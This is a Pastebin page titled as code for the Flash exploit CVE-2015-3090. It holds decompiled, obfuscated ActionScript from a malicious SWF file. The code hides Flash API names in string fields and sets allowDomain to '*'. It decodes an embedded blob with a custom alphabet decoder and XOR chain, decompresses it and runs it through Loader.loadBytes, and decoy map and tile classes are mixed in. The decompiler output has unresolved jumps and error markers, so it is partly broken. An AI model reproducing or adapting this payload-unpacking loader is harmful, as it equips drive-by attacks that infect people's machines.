API tools faq
paste
Advertisement
physicaldrive0

Exploit.SWF CVE-2015-3090 Code

physicaldrive0
Jun 1st, 2015
1,138
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.66 KB | None | 0 0
raw download clone embed print report
  1. package {
  2. import flash.utils.*;
  3.  
  4. public interface Policy {
  5.  
  6. public function send(_arg1:Array, _arg2:String=""):void;
  7. public function receive(_arg1:ByteArray):Array;
  8. public function socketOptionSupported():Array;
  9.  
  10. }
  11. Policy = [OP_NEWCLASS ClassInfo:0 base:null];
  12. IIll1III111I11 = [OP_NEWCLASS ClassInfo:1 base:Object];
  13. II111IIIlllIl1 = [OP_NEWCLASS ClassInfo:2 base:ByteArray];
  14. ArrayTool = [OP_NEWCLASS ClassInfo:3 base:Object];
  15. MathTool = [OP_NEWCLASS ClassInfo:4 base:Object];
  16. ChildTool = [OP_NEWCLASS ClassInfo:5 base:Object];
  17. Encoding = [OP_NEWCLASS ClassInfo:6 base:Object];
  18. 1I111IIIlllIl1 = [OP_NEWCLASS ClassInfo:7 base:MovieClip];
  19. PolicyContext = [OP_NEWCLASS ClassInfo:8 base:Object];
  20. ZMQEvent = [OP_NEWCLASS ClassInfo:9 base:Event];
  21. Coordinate = [OP_NEWCLASS ClassInfo:10 base:Object];
  22. Tile = [OP_NEWCLASS ClassInfo:11 base:Sprite];
  23. }//package
  24.  
  25. import flash.display.*;
  26. import flash.events.*;
  27. import flash.system.*;
  28. import flash.utils.*;
  29. import flash.net.*;
  30.  
  31. package {
  32. public class IIll1III111I11 {
  33.  
  34. public var Illl1III111I11:String;
  35. public var lIll1III111I11:String;
  36. public var llll1III111I11:String;
  37. public var ))ll1III111I11:String;
  38. public var _ll1III111I11:String;
  39. public var +ll1III111I11:String;
  40. public var 11l11III111I11:String;
  41. public var 1Il11III1l1I11:String;
  42. public var I1l11III111I11:String;
  43. public var IIl11III111I11:String;
  44. public var Ill11III111I11:String;
  45. public var lIl11III111I11:String;
  46. public var lll11III111I11:String;
  47. public var _l11III111I11:String;
  48. public var +l11III111I11:String;
  49.  
  50. public function IIll1III111I11(){
  51. this.Illl1III111I11 = "addedToStage";
  52. this.lIll1III111I11 = "writeByte";
  53. this.llll1III111I11 = "uncompress";
  54. this.))ll1III111I11 = "allowDomain";
  55. this._ll1III111I11 = "currentDomain";
  56. this.+ll1III111I11 = "length";
  57. this.11l11III111I11 = "getDefinition";
  58. this.1Il11III1l1I11 = "flash.display.Loader";
  59. this.I1l11III111I11 = "flash.utils.ByteArray";
  60. this.IIl11III111I11 = "stage";
  61. this.Ill11III111I11 = "addEventListener";
  62. this.lIl11III111I11 = "removeEventListener";
  63. this.lll11III111I11 = "enterFrame";
  64. this._l11III111I11 = "loadBytes";
  65. this.+l11III111I11 = "addChild";
  66. }
  67. }
  68. }//package
  69.  
  70. package {
  71. public class II111IIIlllIl1 extends ByteArray {
  72.  
  73. public function +lllIII111I11():void{
  74. }
  75. public function 11ll1III111I11():int{
  76. return (0);
  77. }
  78.  
  79. }
  80. }//package
  81.  
  82. package {
  83. public class ArrayTool {
  84.  
  85. public function ArrayTool():void{
  86. }
  87. public static function adjustValues(_arg1:Array, _arg2, _arg3:String="*"):Array{
  88. var _local4 = [];
  89. var _local5:String;
  90. var _local10:* = _arg1;
  91. var _local9:int;
  92. //unexpected hasnext2
  93. if (!NULL!){
  94. var _local8:String = //unresolved nextvalue or nextname;
  95. _local5 = _local8;
  96. var _local6 = _arg3;
  97. if (_local6 == MathTool.PLUS){
  98. _local4[_local5] = (_arg1[_local5] + _arg2);
  99. } else {
  100. if (_local6 == MathTool.MINUS){
  101. _local4[_local5] = (_arg1[_local5] - _arg2);
  102. } else {
  103. if (_local6 == MathTool.MULTIPLICATION){
  104. _local4[_local5] = (_arg1[_local5] * _arg2);
  105. } else {
  106. if (_local6 == MathTool.DIVISION){
  107. _local4[_local5] = (_arg1[_local5] / _arg2);
  108. } else {
  109. };
  110. };
  111. };
  112. };
  113. //unresolved jump
  114. };
  115. return (_local4);
  116. }
  117. public static function getValueMatchIndex(_arg1:Array, _arg2, _arg3):int{
  118. if (((((!((_arg2 is Array))) && (!((_arg2 is String))))) && (!((((((_arg2 is uint)) || ((_arg2 is int)))) || ((_arg2 is Number))))))){
  119. _arg2 = String(_arg2);
  120. };
  121. var _local4:Array;
  122. if ((_arg2 is Array)){
  123. _local4 = _arg2;
  124. } else {
  125. _local4 = [_arg2];
  126. };
  127. var _local6 = 0;
  128. if ((_local6 < _arg1.length)){
  129. var _local5 = _arg1[_local6];
  130. var _local7 = 0;
  131. if ((_local7 < _local4.length)){
  132. if (_local5.hasOwnProperty(_local4[_local7])){
  133. _local5 = _local5[_local4[_local7]];
  134. if ((((_local7 == (_local4.length - 1))) && ((_local5 == _arg3)))){
  135. return (_local6);
  136. };
  137. } else {
  138. //unresolved jump
  139. };
  140. _local7++;
  141. //unresolved jump
  142. };
  143. _local6++;
  144. //unresolved jump
  145. };
  146. return (-1);
  147. }
  148. public static function copy(_arg1:Array):Array{
  149. var _local2 = [];
  150. var _local3 = 0;
  151. if ((_local3 < _arg1.length)){
  152. _local2[_local3] = _arg1[_local3];
  153. _local3++;
  154. //unresolved jump
  155. };
  156. return (_local2);
  157. }
  158.  
  159. }
  160. }//package
  161.  
  162. package {
  163. public class MathTool {
  164.  
  165. public static const PLUS:String = "+add";
  166. public static const MINUS:String = "-sub";
  167. public static const MULTIPLICATION:String = "*gMu_ltiplication";
  168. public static const DIVISION:String = "/div";
  169.  
  170. public function MathTool():void{
  171. }
  172. }
  173. }//package
  174.  
  175. package {
  176. public class ChildTool {
  177.  
  178. public function ChildTool():void{
  179. }
  180. public static function swapChildren(_arg1:DisplayObject, _arg2:DisplayObject):void{
  181. var _local3 = _arg1.parent;
  182. var _local4 = _arg2.parent;
  183. var _local5 = _local3.getChildIndex(_arg1);
  184. var _local6 = _local4.getChildIndex(_arg2);
  185. ChildTool.moveChild(_arg1, _local4, _local6);
  186. ChildTool.moveChild(_arg2, _local3, _local5);
  187. }
  188. public static function moveChild(_arg1:DisplayObject, _arg2:DisplayObjectContainer, _arg3:int=-1):void{
  189. _arg1.parent.removeChild(_arg1);
  190. if ((_arg3 == -1)){
  191. _arg1 = _arg2.addChild(_arg1);
  192. } else {
  193. _arg1 = _arg2.addChildAt(_arg1, _arg3);
  194. };
  195. }
  196.  
  197. }
  198. }//package
  199.  
  200. package {
  201. public class Encoding {
  202.  
  203. public static function readFrame(_arg1:ByteArray):ByteArray{
  204. var _local2 = new ByteArray();
  205. var _local3 = _arg1.readUnsignedByte();
  206. var _local4 = (((_local3 == 0xFF)) ? true : false);
  207. if (_local4){
  208. if (!((_arg1.readUnsignedInt() == 0))){
  209. throw (new Error("Incoming DATA Exceeds SIZE Maximum Limit"));
  210. };
  211. _local3 = _arg1.readUnsignedInt();
  212. };
  213. _local3 = (_local3 - 1);
  214. var _local5 = (((_arg1.readUnsignedByte() & (1 == 1))) ? true : false);
  215. if (!((_local3 == 0))){
  216. _arg1.readBytes(_local2, 0, _local3);
  217. };
  218. return (_local2);
  219. }
  220. public static function writeFrame(_arg1:ByteArray, _arg2:Boolean=false):ByteArray{
  221. var _local3 = new ByteArray();
  222. var _local4 = _arg1.length;
  223. _local4 = (_local4 + 1);
  224. if ((_local4 < 0xFF)){
  225. _local3.writeByte(_local4);
  226. } else {
  227. _local3.writeByte(0xFF);
  228. _local3.writeUnsignedInt(0);
  229. _local3.writeUnsignedInt(_local4);
  230. };
  231. _local3.writeByte(((_arg2) ? 1 : 0));
  232. _local3.writeBytes(_arg1);
  233. _local3.position = 0;
  234. return (_local3);
  235. }
  236.  
  237. }
  238. }//package
  239.  
  240. package {
  241. public class 1I111IIIlllIl1 extends MovieClip {
  242.  
  243. private var Il111IIIlllIl1;
  244. private var _lllIII111I11:Class;
  245. private var 1Ill1III111I11:IIll1III111I11;
  246. private var _StrPool80:uint = 0;
  247. private var ll111IIIlllIl1:uint = 0;
  248. private var ))111IIIlllIl1:uint = 0xFF;
  249. private var _111IIIlllIl1;
  250. private var 11lllIII111I11;
  251.  
  252. public function 1I111IIIlllIl1(_arg1:Object=null){
  253. this.1Ill1III111I11 = new IIll1III111I11();
  254. Security[this.1Ill1III111I11.))ll1III111I11]("*");
  255. var _local3:* = ApplicationDomain[this.1Ill1III111I11._ll1III111I11];
  256. var _local4 = (_local3[this.1Ill1III111I11.11l11III111I11](this.1Ill1III111I11.1Il11III1l1I11) as Class);
  257. this.Il111IIIlllIl1 = new (_local4)();
  258. this._lllIII111I11 = (_local3[this.1Ill1III111I11.11l11III111I11](this.1Ill1III111I11.I1l11III111I11) as Class);
  259. if (this[this.1Ill1III111I11.IIl11III111I11]){
  260. this.11111IIIlllIl1();
  261. } else {
  262. this[this.1Ill1III111I11.Ill11III111I11](this.1Ill1III111I11.Illl1III111I11, this.11111IIIlllIl1);
  263. };
  264. }
  265. public function EmptyHandler(_arg1:Object, _arg2:int):void{
  266. _arg2++;
  267. }
  268. private function 11111IIIlllIl1(_arg1:Object=null):void{
  269. this[this.1Ill1III111I11.lIl11III111I11](this.1Ill1III111I11.Illl1III111I11, this.11111IIIlllIl1);
  270. this[this.1Ill1III111I11.Ill11III111I11](this.1Ill1III111I11.lll11III111I11, this.I1111IIIlllIl1);
  271. var _local2:* = new II111IIIlllIl1();
  272. var _local3:* = new this._lllIII111I11();
  273. this.1IlllIII111I11();
  274. this.IIlllIII111I11(_local2, _local2[this.1Ill1III111I11.+ll1III111I11], _local3);
  275. this.I1lllIII111I11(_local3);
  276. var _local4:uint = 76;
  277. var _local5 = 0;
  278. if ((_local5 < _local3[this.1Ill1III111I11.+ll1III111I11])){
  279. var _local6:uint = (_local3[_local5] ^ _local4);
  280. _local4 = _local3[_local5];
  281. _local3[_local5] = _local6;
  282. _local5++;
  283. //unresolved jump
  284. };
  285. _local3[this.1Ill1III111I11.llll1III111I11]();
  286. this.Il111IIIlllIl1[this.1Ill1III111I11._l11III111I11](_local3);
  287. this[this.1Ill1III111I11.+l11III111I11](this.Il111IIIlllIl1);
  288. //unresolved jump
  289. !ERROR! return;
  290. }
  291. private function I1111IIIlllIl1(_arg1):void{
  292. if ((this.currentFrame == 200)){
  293. this.I1ll1III111I11(new Number(2));
  294. return;
  295. };
  296. }
  297. private function 1IlllIII111I11():void{
  298. this._111IIIlllIl1 = new this._lllIII111I11();
  299. this.11lllIII111I11 = new this._lllIII111I11();
  300. var _local2:int;
  301. _local2 = 65;
  302. if ((_local2 < 91)){
  303. this.11lllIII111I11[this.1Ill1III111I11.lIll1III111I11](_local2);
  304. _local2++;
  305. //unresolved jump
  306. };
  307. _local2 = 97;
  308. if ((_local2 < 123)){
  309. this.11lllIII111I11[this.1Ill1III111I11.lIll1III111I11](_local2);
  310. _local2++;
  311. //unresolved jump
  312. };
  313. _local2 = 48;
  314. if ((_local2 < 58)){
  315. this.11lllIII111I11[this.1Ill1III111I11.lIll1III111I11](_local2);
  316. _local2++;
  317. //unresolved jump
  318. };
  319. _local2 = 33;
  320. if ((_local2 < 48)){
  321. if ((((((_local2 == 34)) || ((_local2 == 39)))) || ((_local2 == 45)))){
  322. } else {
  323. this.11lllIII111I11[this.1Ill1III111I11.lIll1III111I11](_local2);
  324. };
  325. _local2++;
  326. //unresolved jump
  327. };
  328. _local2 = 58;
  329. if ((_local2 < 65)){
  330. this.11lllIII111I11[this.1Ill1III111I11.lIll1III111I11](_local2);
  331. _local2++;
  332. //unresolved jump
  333. };
  334. _local2 = 91;
  335. if ((_local2 < 97)){
  336. if ((_local2 == 92)){
  337. } else {
  338. this.11lllIII111I11[this.1Ill1III111I11.lIll1III111I11](_local2);
  339. };
  340. _local2++;
  341. //unresolved jump
  342. };
  343. _local2 = 123;
  344. if ((_local2 < 127)){
  345. this.11lllIII111I11[this.1Ill1III111I11.lIll1III111I11](_local2);
  346. _local2++;
  347. //unresolved jump
  348. };
  349. this.11lllIII111I11[this.1Ill1III111I11.lIll1III111I11](34);
  350. var _local3:int;
  351. _local3 = 0;
  352. if ((_local3 < 0xFF)){
  353. this._111IIIlllIl1[_local3] = 0xFF;
  354. _local3++;
  355. //unresolved jump
  356. };
  357. _local3 = 0;
  358. if ((_local3 < this.11lllIII111I11[this.1Ill1III111I11.+ll1III111I11])){
  359. this._111IIIlllIl1[this.11lllIII111I11[_local3]] = _local3;
  360. _local3++;
  361. //unresolved jump
  362. };
  363. }
  364. public function I1lllIII111I11(_arg1):uint{
  365. var _local2:uint = 0;
  366. if (!((this.))111IIIlllIl1 == 0xFF))){
  367. _arg1[_arg1[this.1Ill1III111I11.+ll1III111I11]] = (this._StrPool80 | (this.))111IIIlllIl1 << this.ll111IIIlllIl1));
  368. _local2 = (_local2 + 1);
  369. };
  370. return (_local2);
  371. }
  372. public function IIlllIII111I11(_arg1, _arg2:uint, _arg3):uint{
  373. var _local4 = 0;
  374. var _local5:uint = 0;
  375. var _local6:uint = 8191;
  376. _local4 = 0;
  377. if ((_local4 < _arg2)){
  378. if ((this._111IIIlllIl1[_arg1[_local4]] == 0xFF)){
  379. } else {
  380. if ((this.))111IIIlllIl1 == 0xFF)){
  381. this.))111IIIlllIl1 = this._111IIIlllIl1[_arg1[_local4]];
  382. } else {
  383. this.))111IIIlllIl1 = (this.))111IIIlllIl1 + (this._111IIIlllIl1[_arg1[_local4]] * this.11lllIII111I11[this.1Ill1III111I11.+ll1III111I11]));
  384. this._StrPool80 = (this._StrPool80 | (this.))111IIIlllIl1 << this.ll111IIIlllIl1));
  385. this.ll111IIIlllIl1 = (this.ll111IIIlllIl1 + ((((this.))111IIIlllIl1 & _local6) > 88)) ? 13 : 14));
  386. var _local8 = _local5;
  387. _local5 = (_local8 + 1);
  388. _arg3[_local8] = (this._StrPool80 & 0xFF);
  389. this._StrPool80 = (this._StrPool80 >> 8);
  390. this.ll111IIIlllIl1 = (this.ll111IIIlllIl1 - 8);
  391. //unresolved if
  392. this.))111IIIlllIl1 = 0xFF;
  393. };
  394. };
  395. _local4++;
  396. //unresolved jump
  397. };
  398. return (_local5);
  399. }
  400.  
  401. }
  402. }//package
  403.  
  404. package {
  405. public class PolicyContext implements Policy {
  406.  
  407. private var socket:Socket;
  408. private var getOption:Function;
  409. private var policies:Dictionary;
  410. private var activePolicy:Policy;
  411.  
  412. public function PolicyContext(_arg1:Socket, _arg2:Function){
  413. this.socket = _arg1;
  414. this.getOption = _arg2;
  415. this.policies = new Dictionary();
  416. }
  417. public function activatePolicy(_arg1:String):void{
  418. this.activePolicy = new (this.policies[_arg1] as Class)(this.socket, this.getOption);
  419. }
  420. public function addPolicy(_arg1:String, _arg2:Class):PolicyContext{
  421. this.policies[_arg1] = _arg2;
  422. return (this);
  423. }
  424. public function socketOptionSupported():Array{
  425. return (this.activePolicy.socketOptionSupported());
  426. }
  427. public function send(_arg1:Array, _arg2:String=""):void{
  428. this.activePolicy.send(_arg1, _arg2);
  429. }
  430. public function receive(_arg1:ByteArray):Array{
  431. return (this.activePolicy.receive(_arg1));
  432. }
  433.  
  434. }
  435. }//package
  436.  
  437. package {
  438. public class ZMQEvent extends Event {
  439.  
  440. public static const MESSAGE_RECEIVED:String = "messageReceived";
  441.  
  442. private var _data:Array;
  443.  
  444. public function ZMQEvent(_arg1:String, _arg2:Array=null){
  445. this._data = _arg2;
  446. super(_arg1, true, false);
  447. }
  448. public function get data():Array{
  449. return (this._data);
  450. }
  451. override public function clone():Event{
  452. return (new ZMQEvent(this.type, this.data));
  453. }
  454.  
  455. }
  456. }//package
  457.  
  458. package {
  459. public class Coordinate {
  460.  
  461. public var row:Number;
  462. public var column:Number;
  463. public var zoom:Number;
  464.  
  465. public function Coordinate(_arg1:Number, _arg2:Number, _arg3:Number){
  466. this.row = _arg1;
  467. this.column = _arg2;
  468. this.zoom = _arg3;
  469. }
  470. public function toString():String{
  471. return ((((((("(" + this.row) + ",") + this.column) + " @") + this.zoom) + ")"));
  472. }
  473. public function copy():Coordinate{
  474. return (new Coordinate(this.row, this.column, this.zoom));
  475. }
  476. public function container():Coordinate{
  477. return (new Coordinate(Math.floor(this.row), Math.floor(this.column), this.zoom));
  478. }
  479. public function zoomTo(_arg1:Number):Coordinate{
  480. return (new Coordinate((this.row * Math.pow(2, (_arg1 - this.zoom))), (this.column * Math.pow(2, (_arg1 - this.zoom))), _arg1));
  481. }
  482. public function zoomBy(_arg1:Number):Coordinate{
  483. return (new Coordinate((this.row * Math.pow(2, _arg1)), (this.column * Math.pow(2, _arg1)), (this.zoom + _arg1)));
  484. }
  485. public function isRowEdge():Boolean{
  486. return ((Math.round(this.row) == this.row));
  487. }
  488. public function isColumnEdge():Boolean{
  489. return ((Math.round(this.column) == this.column));
  490. }
  491. public function isEdge():Boolean{
  492. return (((this.isRowEdge()) && (this.isColumnEdge())));
  493. }
  494. public function up(_arg1:Number=1):Coordinate{
  495. return (new Coordinate((this.row - _arg1), this.column, this.zoom));
  496. }
  497. public function right(_arg1:Number=1):Coordinate{
  498. return (new Coordinate(this.row, (this.column + _arg1), this.zoom));
  499. }
  500. public function down(_arg1:Number=1):Coordinate{
  501. return (new Coordinate((this.row + _arg1), this.column, this.zoom));
  502. }
  503. public function left(_arg1:Number=1):Coordinate{
  504. return (new Coordinate(this.row, (this.column - _arg1), this.zoom));
  505. }
  506. public function equalTo(_arg1:Coordinate):Boolean{
  507. return (((((((_arg1) && ((_arg1.row == this.row)))) && ((_arg1.column == this.column)))) && ((_arg1.zoom == this.zoom))));
  508. }
  509.  
  510. }
  511. }//package
  512.  
  513. package {
  514. public class Tile extends Sprite {
  515.  
  516. public static var count:int = 0;
  517.  
  518. public var zoom:int;
  519. public var row:int;
  520. public var column:int;
  521.  
  522. public function Tile(_arg1:int, _arg2:int, _arg3:int){
  523. this.init(_arg1, _arg2, _arg3);
  524. this.cacheAsBitmap = false;
  525. count = (count + 1);
  526. }
  527. public function init(_arg1:int, _arg2:int, _arg3:int):void{
  528. this.zoom = _arg3;
  529. this.row = _arg2;
  530. this.column = _arg1;
  531. this.hide();
  532. }
  533. public function destroy():void{
  534. for (;(this.numChildren > 0);) {
  535. var _local1 = this.removeChildAt(0);
  536. //unresolved if
  537. Loader(_local1).unload();
  538. continue;
  539. !ERROR! };
  540. this.graphics.clear();
  541. }
  542. public function isShowing():Boolean{
  543. return ((this.alpha == 1));
  544. }
  545. public function showNow():void{
  546. this.alpha = 1;
  547. }
  548. public function show():void{
  549. this.alpha = 1;
  550. }
  551. public function hide():void{
  552. this.alpha = 0;
  553. }
  554.  
  555. }
  556. }//package
  557.  
  558. "twitter.com/physicaldrive0"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!